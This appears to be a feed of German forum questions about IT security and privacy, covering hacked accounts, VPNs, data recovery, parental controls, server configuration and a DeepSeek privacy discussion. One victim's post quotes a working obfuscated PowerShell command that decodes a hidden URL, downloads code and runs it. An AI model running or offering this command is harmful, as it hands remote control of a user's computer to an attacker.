Danach würde ich das System neu aufsetzen und somit von Viren befreien

Nur macht es mir Sorgen, der Virus könnte sich u. U. im BIOS einnisten und dann sich gar nicht mehr entfernen lassen ?

Kann das passieren, wie wahrscheinlich ist das?

Es handelt sich selbstverständlich um KEIN Uefi BIOS mit secure boot und ähnlichem.

In meiner anderen Frage meintet ihr, dass Iridium mit AES Verschlüsselung sei, obwohl CCC.media meint, dass sogar der Standort des Empfängers im Klartext in die Gegend gebrüllt wird... Aber nun sagt auch Heise, dass zumindest e*Cityruf auch ohne Verschlüsselung ist...

Bei Windkraft-/Solar-Parks wurde doch auch schonmal gefunden, dass da lächerlich geringe Sicherheits-Schwellen vorgesehen sind... BÖLD berichtete...

Wie hohl ist also die Gesetzgebung?

Werden Daten jetzt also vor fremdem Zugriff geschützt?

Hallo zusammen, ich habe 2 Google-Konten mit 2 Email-Adressen und zwei Passwörtern. Ich kann mich damit nicht gleichzeitig in beide Konten anmelden. Angenommen, ein Google-Konto von mir wird gehackt. Könnte der Hacker irgendwie doch Zugriff auf mein zweites Google-Konto erlangen? Eigentlich ja nicht oder?

Hallo,

ich würde gerne einen Minecraft Server auf meinem eigenen homeserver installieren, müsste dafür aber allerdings einen Port von meinem Router freigeben und da habe ich Angst schnell gehackt zu werden. Weiß vielleicht einer wie ich das sicher machen kann ?

Der neue chinesische Chatbot DeepSeek überrascht durch geringe Kosten und unglaubliche Effizienz. Doch es gibt bereits erste Bedenken hinsichtlich des Datenschutzes...

Neuer chinesischer Chatbot

Zu Wochenbeginn überholte die App des neuen chinesischen Chatbots überraschenderweise die bisher führende US-KI-Anwendung ChatGPT bei den Downloads im App-Store von Apple. Der chinesische Chatbot soll dem bisherigen Marktführer von Open AI ebenbürtig sein, hat in der Entwicklung offenbar jedoch nur lediglich 5,6 Millionen Dollar gekostet.

Donald Trump sprach hinsichtlich der erstarkten Konkurrenz aus China von einem "Weckruf" für US-Unternehmen, die den Konkurrenzkampf von nun an aufnehmen wollen.

Unternehmen erfüllt DSGVO derzeit nicht

Kurz nach Veröffentlichung der Anwendung gab es bereits erste Zweifel hinsichtlich des Datenschutzes. Laut europäischer Datenschutzgrundverordnung (DSGVO) ist ein Datenaustausch lediglich zwischen Ländern erlaubt, deren Schutzniveau mit dem der EU vergleichbar ist. Bisher fehlt ein entsprechendes Abkommen mit China.

Auch besitzt das Unternehmen bisher keine Niederlassung in Europa oder einen gesetzlichen Vertreter, was ebenfalls einem Verstoß gegen die DSGVO gleichkommt.

Italien sperrt die App vorerst

Am Mittwoch konnte eine israelische Cybersicherheitsfirma ein Datenleck beim chinesischen Unternehmen aufdecken. Dabei seien viele Datensätze ungesichert im Internet gelandet.

Italiens Datenschutzbehörde hat den Zugang zur Anwendung derzeit gesperrt, um Nutzerdaten zu schützen. Auf die Frage, welche personenbezogenen Daten die App erhebe, antwortete die Firma laut Angaben bislang völlig unzureichend.

Unsere Fragen an Euch:

• Habt Ihr aktuell Bedenken angesichts von möglichen Mängeln beim Datenschutz?
• Welche Kriterien muss eine App für Euch erfüllen, damit Ihr diese als sicher / vertrauenswürdig einstuft?
• Konntet Ihr DeepSeek schon testen? Wie waren Eure Erfahrungen?
• In welchen Lebenslagen greift Ihr auf Chatbots wie ChatGPT oder DeepSeek zurück?

Wir freuen uns auf Eure Antworten.

Viele Grüße

Euer gutefrage Team

Minecraft Bedrock Edition
Ich hatte bisher immer stabile 60 FPS. Heute starte ich das Spiel, und schon im Menü sind es nur noch 8 FPS (schwankt zwischen 5 und 12). Den PC habe ich neu gestartet – keine Verbesserung. Cache geleert – immer noch das gleiche Problem. Ich weiß nicht, was ich tun soll. Texturpacks oder anderwärtige Mods sind nicht aktiviert bzw. habe ich alle deaktiviert.

Am besten so günstig wie möglich, allerdings soll es an Leistung nicht fehlen.

habe seit ein paar tage kali und erstmal wine installiert undn jetzt hätte ich gerne etwas inspiration

danek :D

Seid in euren Online-Aktivitäten auf Datenschutz bedacht oder ist es euch egal wie, wo und mit was ihr euch anmeldet solange ihr das tun könnt was ihr wollt?

Wenn ihr auf Datenschutz bedacht seid, was und wie geht ihr vor im eure Privatsphäre zu schützen und mit den Daten sparsam umzugehen?

Hier der Befehl den ich bekommen hab, den sollte ich über STRG+V bei bei Win+R einfügen.

powershell -w hidden -c $r='0hHdukzR5xWcPpldvImRGN1Lt92YuIjc0hTNxE2axAnM58yL6MHc0RHa';$u=($r[-1..-($r.Length)]-join '');&($u|%{&('iwr') ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($_)))|&('iex')}); # ⠀Telegram⠀⠀⠀⠀

wie kann ich das Rückgängig machen ?⠀⠀⠀⠀⠀⠀⠀

Mein BS: Win10⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀

Was sind das für komische Dateien?

Es werden immer mehr.

Habe das Gefühl ich werde von Hackern verfolgt, egal was ich mache, welches betriebssystem ich Installeire, irgendwas fängt immer an zu Spinnen.

Ich versuche Softwareentwickler zu werden und vielleicht versucht man meinen erfolg zu verhindern?

Moin,

ich bin momentan in der 9. Klasse eines Gymnasiums, und das Abitur rückt langsam näher. Ich bin mir jedoch noch nicht sicher, was ich später machen bzw. studieren soll. Mein Ziel ist es, im Bereich Cybersicherheit zu arbeiten – mit den besten Qualifikationen und fundiertem Wissen. Was wäre der beste Weg, um dieses Ziel zu erreichen?

Zweite Frage:

Auf den Webseiten mancher Universitäten sehe ich verschiedene IT-Studiengänge wie Cybersecurity, Wirtschaftsinformatik, Informatik usw. Kann man all diese Themen in einem Studium kombinieren oder sich in mehreren Bereichen ausbilden? Ich würde gerne ein breites Wissen in all diesen Bereichen haben.

Mir ist noch eine kurze Frage eingefallen: Was muss man vor dem Studium schon so alles wissen?

Danke im voraus.

Ich habe heute mittels eines Tablets die Website einer Hotelkette besucht. Später wurde mir auf einem PC Werbung dieser Hotelkette angezeigt.

Hier kann doch nur die IP- Adresse genutzt werden, um die Geräte zu verknüpfen, oder wie funktioniert das?

Kann ich mich da irgendwie schützen? Auf dem PC nutze ich in der Regel die Suchmaschine DuckDuckGo, auf dem Tablet auch oft google. Würde es etwas nutzen, auch mit dem Tablet konsequent auf DuckDuckGo umzusteigen oder nutzt das gar nichts?

Wird durch alte Betriebssysteme auf privaten Heim-Rechnern zu Hause auch die Sicherheit des ganzen Landes (D) gefährdet (bei Internetbenutzung)?

Ich reise ge­ra­de in Ma­rok­ko und nutze mein Han­dy als Hot­spot für mei­nen Lap­top. Da­zu be­nu­tze eine lokale SIM-Kar­te, und nur der Him­mel weiß, wie mich der ma­rok­ka­ni­sche ISP an die Kan­dare nimmt. Lö­sung: Ich sur­fe über ein VPN.

Bisher habe ich das VPN im­mer nur auf dem Lap­top genutzt (direkt mit open­vpn, weil ich sonst Soft­ware des VPN-An­bie­ters in­stal­lie­ren müß­te). So macht man es ja auch, wenn man das Hotel-Wifi nutzt. Aber jetzt ist mir ein­ge­fal­len, daß ich ja auch ein VPN auf dem Han­dy in­stal­lie­ren könnte; das wäre für mich OK, weil ich das Han­dy oh­ne­hin nicht viel an­der­wei­tig nutze.

Die Frage ist jetzt nur: Was ist besser vom Sicher­heits­stand­punkt her? Sollte bes­ser das Han­dy den VPN-Tun­nel über­neh­men, oder wie bis­her der Lap­top? Geht auch bei­des zu­sam­men? Was läßt die ge­ring­ste Daten­spur zurück?

Hey :) Ich hatte ein paar Videos (insgesamt nur ein paar MB) auf einem USB Stick. Mein Laptop hat mir gesagt, dass der Stick fehlerhaft ist und repariert werden sollte, doch danach waren diese Videos vom Stick gelöscht.

Ich habe bereits 5-6 Programme zur Datenrettung ausprobiert und bleibe immer vor dem gleichen Programm hängen: Es kostet Geld und das nicht gerade wenig. Ich kann nicht 50 und mehr Euro für ein Abo ausgeben, nur um 4-5 Videos wiederherzustellen.

Disk Drill hat bei mir zuverlässig funktioniert, allerdings habe ich das vor Monaten schon einmal benutzt und das Programm merkt sich das und mein gratis Volumen dort ist aufgebraucht, das geht also auch nicht.

Recuva wird mir auch immer wieder empfohlen, die Software findet die gelöschten Videos vom Stick aber gar nicht. Und wie gesagt, alle anderen Programme sind kostenpflichtig.

Wer weiß Rat, wie ich an meine paar wenigen Videos komme? :(

weiß einer, ob dieser Forum serös ist? kann man davon viren einfangen? Ich war nämlich darauf und habe den link (https://www.android-hilfe.de) bei Virustotal überprüfen lassen und da wurde vom Programm MalwareURL als Malware erkannt.

Muss ich mir nun Sorgen machen oder kann es eine fehlmeldung sein?

Habe ich nun Viren/malwares auf meinem Gerät, weil ich kurz auf der Webseite war?

Hallo,

Wie kann man theoretische Sachen in der Cybersecurity in der Praxis umsetzen zum üben.

Ich möchte das vor dem dualen Studium üben.

Danke im voraus:)

Telegram hat mir vorhin angezeigt, dass mein Mann nun auch Telegram nutzen würde. Der ist aber überhaupt nicht dort unterwegs und auch in keinen anderen Messengern. Das Handy von ihm ist ein ganz altes Samsung, er könnte damit gar nicht surfen. Hat er sich da über sein Laptop "etwas eingefangen"? Ich bin leicht irritiert.

Ich habe gerade auf meiner uralten Festplatte Fotos in einer zip-datei gefunden und herausfinden müssen, dass da ein Passwort drauf ist. Hat jemand einen Tipp?

Hallo

ich wollte mal aus Interesse fragen wie Hacker zu Vieren kommen und diese herunterladen (bsp USB- Stick) ohne sich selbst den Virus auf den Computer zu laden?

https://youtu.be/LjnqD4HeSAo?si=akkxKbvZIxdW3h5T

Guten Tag an alle Helfenden,

derzeit arbeite ich für meinen Neffen mit AdGuard als Programm damit dieser in seinem jungen Alter (7) nicht einfach auf unerwünschte Inhalte stößt wenn er mit seinem Tablet für die Schule arbeiten muss. Wie wir wissen, geht das leider sehr schnell und vor allem sehr einfach, selbst wenn es nicht mal gezielt gesucht wurde.

Jedoch bin ich mit AdGuard nicht wirklich zufrieden, zumal dieses Programm auch einfach ohne Hindernisse deinstalliert werden kann. Ich suche nach einem Programm, welches solche Inhalte sperrt und bestenfalls nicht ohne meine Zustimmung (in Form von Passwort oder Ähnlichem) deinstalliert werden kann. Habt ihr Vorschläge was da gut sein könnte?

Bitte keine abfälligen Kommentare oder irgendwas dergleichen. Manche werden das verstehen und andere gehen eben anders gegen sowas vor. Jeder hat da seinen eigenen Weg 😊

Danke im Voraus für alle Hilfen.

Das Samsung Galaxy S20 kriegt z. B. Keine Updates mehr. Hat zuletzt Android 14 bekommen. Android 15 kriegt es nicht mehr.

Huhu Leute habe seit Jahren Probleme mit Hackern die mich überwachen weil ich damals mal scheisse gebaut hatte ich weiß das mein Router gehackt ist benutze seidt mehreren Jahren ein sicherheitshandy mit GrapheneOs allerdings wenn ich online auf den Phone spiele werde ich wie auf der PS5 immer wieder in die Lobbys gezogen wo die namen sind womit sie mich seit Jahren mobben unteranderm auch im chat schreiben sie mich direkt an benutze auch zusätzlich VPN. Frage jetzt wie können die mich immer wieder in warte Lobbys schicken wo die auch drin sind und wie kann ich mich dagegen schützen!!?

Hallo, ich habe mir nach langem Sparen mal einen neuen PC geleistet .. also neu von Amazon, aber als Neuware deklariert. Die 512 GB SSD sind dann noch 423 GB… Bei BIOS steht 23/07/2023. was mir aber vor allem etwas komisch vorkam war eben das mit dem hypervisor.. habe das in perplexity eingegeben und da steht, dass es eben ein sicherheitsrisiko sein kann. Was kann ich da jetzt machen? Ich würde mich sehr über eine Einschätzung von einem der vielen IT Profis unter euch freuen! :)

Wie kann ich eine HTTPS Verbindung zu nextcloud auf meinem Ubuntu Server herstellen?

Danke

Hey, ich habe eine Frage und würde gerne eure Meinung dazu hören: Denkt ihr, ich übertreibe, oder könnte das wirklich ein Trojaner gewesen sein?

In den letzten Tagen habe ich meinen PC häufiger gescannt, da ich im Browser-Cache eine Trojaner-Warnung erhalten habe. Ich habe die Bedrohung sofort beseitigt, und danach schien alles sauber zu sein. Nach einiger Zeit tauchte die Warnung jedoch erneut auf. Auch dieses Mal habe ich sie gelöscht, und danach schien das Problem endgültig behoben zu sein.

Um auf Nummer sicher zu gehen, habe ich danach stündlich automatische Scans durchgeführt. Zusätzlich habe ich Malwarebytes installiert und auch den Windows Defender aktiviert. Bei einem Defender-Scan bekam ich jedoch plötzlich eine Meldung, dass meine Administratorrechte irgendwie eingeschränkt seien.

Außerdem fiel mir auf, dass mein Browser Opera auf dem Desktop plötzlich in "gute" umbenannt wurde. Ich bin mir nicht sicher, ob ich das selbst gemacht habe – ich kann mich nicht daran erinnern. Abgesehen davon habe ich keine weiteren Auffälligkeiten bemerkt.

Mittlerweile habe ich meinen Rechner komplett neu aufgesetzt. Trotzdem mache ich mir Sorgen, ob meine persönlichen Daten möglicherweise gefährdet waren oder immer noch sind.

Seit kurzem passiert es fast täglich 1-2x , dass Ich von GF auf die Webseite mit Pornhub Werbung geleitet werde.Ich klicke sie weg. Ich habe nichts runtergeladen, nutze edge, ein Virenscheck hat keine Bedrohung gefunden. Auch in meiner langen Cookies Liste konnte Ich sie nicht finden. Mail an GF ist raus .Ich weiss nicht ob GF der Verursacher ist, weil Ich hier viel unterwegs bin .

Systemadministratoren unterschiedlicher Richtungen haben ja Zugriffe zu internen Datenbanken von Unternehmen, Behörden, Banken, usw... Die können ja im Grunde vertrauliche Unternehmensdokumente und ähnliches (unbemerkt) kopieren und es Dritten weitergeben.

Wie schützt man als Organisation davor?

Ich meinte irgendwo mal gelesen dass wenn man zb Private Informationen oder zb sein Gesicht bei Fotos mit der standardbearbeitung die ja jede vorinstallierte galerie bei Android hat, verwischt/drüberzeichnet und man es dann veröffentlicht es von leuten die es runtergeladen haben mit einer software wieder rückgängig gemacht werden kann und man das verdeckte sehen kann? ._. Also keine Ahnung ob das stimmt und wie das gehen würde fallt mir auch nicht ein xD meinte ich aber mal vor langer zeit gelesen zu haben wie gesagt ^^

Wo findet man das *.jamfcloud.de Zertifikat?

Servus allerseits!

mal wieder habe ich ein Problem, welches ich irgendwann mal irgendwie gelöst habe, aber nicht mehr drauf komme, wie..

Es geht um folgendes:

Ich musste Änderungen am Webserver vornehmen. Zuvor verwendete ich nur Apache2, was allerdings aus notwendigen Gründen erweitert werden muss.

Also habe ich NGINX auf der Hauptmaschine installiert. Dieser leitet nach Konfiguration auch perfekt auf den Webserver, ebenfalls NGINX.

Nun aber kommen wir zu dem Knackpunkt:
Zeitgleich verwende ich Apache2. Bedeutet, Die Anfragen werden von NGINX via ProxyPass in die entsprechenden Richtungen weitergeleitet. Auch das funktioniert.

Bedeutet: NGINX auf Port 80 und Apache2 auf Port 8080

ABER!:

Wenn ich jetzt die IP Adresse des Servers im Browser eingebe, wird man auf die Webseite weitergeleitet, die mit der Domain, welche auf den Server zeigt, verbunden ist.

Ich möchte und brauche es allerdings, genau das nicht funktioniert. Also gibt man die IP-Adresse ( http://IPADRESSE ) ein soll entweder nichts passieren, oder diese Anfrage abgelehnt werden.

Google und alle anderen machen das zB. genauso: Da lädt die Seite einfach und bekommt dann die Standardmeldung < Die Webseite ist nicht erreichbar >.

Um es festzuhalten:

http://IPADRESSE soll ins Leere führen, währenddessen http[s]://DOMAIN weiterhin das Ziel ausführt.

Ich hoffe, das war einigermaßen verständlich.

Kann mir hier zufällig jemand weiterhelfen? Die gefundenen Tutorials waren nicht hilfreich.

Vielen Dank im Voraus!

Liebe Grüße und einen fröhlichen 2. Advent wünsche ich allen! :)

Hallo,

Wäre es sinnvoll, wenn ich erstmal Python lerne, bevor ich mit Cybersecurity an sich anfange?

Danke im vorraus:)

1. Frage = Fragetitel

2. Frage: Welche Daten werden vom App aus meinem Android.behoben?

3. Bekommt die App die Bilder, Textnachrichten, etc.?

3. Frage: Speichert die App die Daten im Server auf?

4. Kann das Unternehmen auf meine Bilder, Videos und Nachrichten zugreifen?

__________

Auf der Startseite steht Smart Scan.

Wenn ich da drauf drücke, taucht das untere Bild auf. Im Bezug auf die Fragen, was passiert wenn ich auf ok drücke?

Oder da drauf?:

Hallo, eine Frage an alle Computer- und Sicherheitsexperten. Gibt es eine Möglichkeit, Online-Banking über den Standard hinaus zusätzlich zu sichern? Oder ist dieser Standard bereits sicher genug?

Aktuell ist mein Login per PIN beziehungsweise Face-ID möglich, für Transaktionen ist zusätzlich eine TAN nötig, die ich per App auf meinem Smartphone empfange.

Wie sicher ist dieses Verfahren? Ich habe schon überlegt, mir für meinen Depot-Zugang ein extra Smartphone zuzulegen, welches ausschließlich für das Empfangen der TAN dient und mit dem ich nicht in den Browser gehe, um zu vermeiden das Schadsoftware auf mein Gerät gelangt.

Wäre das eine sinnvolle Maßnahme oder sind moderne Smartphones und insbesondere iOS-Geräte mittlerweile sicher genug, dass man sich da keine großen Gedanken mehr machen muss?

Hallo GF Community,

Ich habe nachfolgendes Problem bei dem ich nicht weiterkomme und eure Hilfe benötige.

Vorab möchte ich jedoch sagen das ich mich aktuell der Ausbildung zum Fachinformatiker 1. LJ befinde und es deswegen sehr am ego kratzt das ich es nicht alleine hinbekommen und auf der anderen Seite mir sehr unangenehm bzw. peinlich wäre in der Klasse zu fragen. Weswegen ich das gerne auch mit eurer Hilfe gelöst bekommen möchte. Deswegen bitte ich um konstruktive Hilfe! Danke!

Wie es dazu kam kann ich nicht mehr genau nachvollziehen da mein Notebook gestern sowohl mein Bruder und danach ich benutzte zwischen durch wurde er nicht runtergefahren und erst gestern nacht von mir selbst.

Heute dann beim einschalten nach dem einloggen direkt dieser screen .

Es sieht aus wie eine Anwendung welche im voll bildmodus läuft welche die Benutzung einschränkt.

So komme ich weder auf den Desktop noch in den Taskmanager oder auf bitdefender.

Lediglich in strg alt entf !

Was ich bis jetzt versucht habe war über die bitdefender app ein Scanner durchzuführen welcher kein Ergebnisse lieferte.

Mit alt f4 spam alles schließen

F11 Vollbild Anwendung schießen

Taskmanager öffnen geht nicht weil der screen es nicht zulässt weil oberste anzeige

Windows im abgesicherten Modus starten bzw einschalten 10 sek lang halten und Neustarten.

Ich habe diverse Anleitungen und Videos im Internet gesehen das Problem ist nur das diese mir nicht weiterhelfen da ich weder auf meinen Desktop zugreifen kann bzw. Auf den Taskmanager oder task leiste was viele dort beschreiben.

Ich kann direkt nach dem login nichts mehr tun da der screen sich über alles legt.

Ich bitte um eure Mithilfe vielen Dank.

Grüße

Mel

Hi,

Also in Firefox gibt es ja ne neue Sicherhetslücke wo durch den Besuch einer gefälschten Website ein Virus ins System geladen wird, daher soll man Firefox ja updaten.

Die aktuelle Version soll ja 133 von Firefox sein, aber mein Linux Mint Rechner ist auf Firefox 132.2 .

Updates sind laut LM Repo nicht verfügbar, wann wird das gepachtet?

Norton hat diese Datei zuerst in die Quarantäne gesteckt. Virustotal hatte 11 Erkennungen. Kennt jemand die Datei? Ist das wirklich ein Trojaner?

Hallo

Hallo Community,

Ich war vorhin auf einer total komischen Website: Als ich die Seite öffnete, sah es erst so aus als würde gleich ein Video abgespielt werden, aber dann hat die Seite auf einmal angefangen so komisch und hektisch zu flackern und mein Handy hat im Takt dazu vibriert.

Ich habe mich total erschrocken und Google geschlossen. Danach habe ich meine Browserdaten der letzten 15 Minuten gelöscht. Deshalb finde ich die Seite auch nicht mehr. Aber irgendwie stand im Link irgendwas mit safety oder so. Dabei war das eine Seite, die eigentlich echt harmlos aussah und es kam auch keine Warnung für eine unsichere Verbindung. Ich dachte auf der Seite würden Insider Infos über einen Skandal in Hollywood stehen, deshalb habe ich sie geöffnet.

Kann mir jemand sagen was das für eine Seite war und ob das gefährlich ist? Ich habe leider keine Ahnung was ich jetzt tun soll.

LG

Sina

Ich nutze Bitwarden, um meine Passwörter zu speichern, und habe für alle Dienste, die es unterstützen, 2FA aktiviert. Die TOTP-Codes speichere ich ebenfalls direkt in Bitwarden, statt eine separate App zu verwenden. Der Zugang zu meinem Bitwarden-Konto ist durch einen YubiKey Security Key Series als zweiten Faktor abgesichert. Meine Frage ist: Ist es sinnvoll, die TOTP-Codes in Bitwarden zu speichern, wo auch die Passwörter gespeichert sind, oder wäre es sicherer, eine separate App für die TOTP-Codes zu verwenden?